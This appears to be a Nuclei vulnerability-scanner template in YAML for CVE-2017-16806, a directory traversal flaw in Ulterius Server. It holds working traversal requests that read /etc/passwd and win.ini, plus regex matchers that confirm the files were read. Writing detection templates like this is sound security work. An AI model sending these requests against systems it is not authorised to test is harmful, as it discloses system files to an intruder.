nuclei-templates/cves/2017/CVE-2017-16806.yaml

33 lines
930 B
YAML

id: CVE-2017-16806
info:
name: Ulterius Server < 1.9.5.0 - Directory Traversal
author: geeknik
reference: https://www.exploit-db.com/exploits/43141
severity: high
tags: cve,cve2017,ulterius,traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2017-16806
cwe-id: CWE-22
description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal."
requests:
- method: GET
path:
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body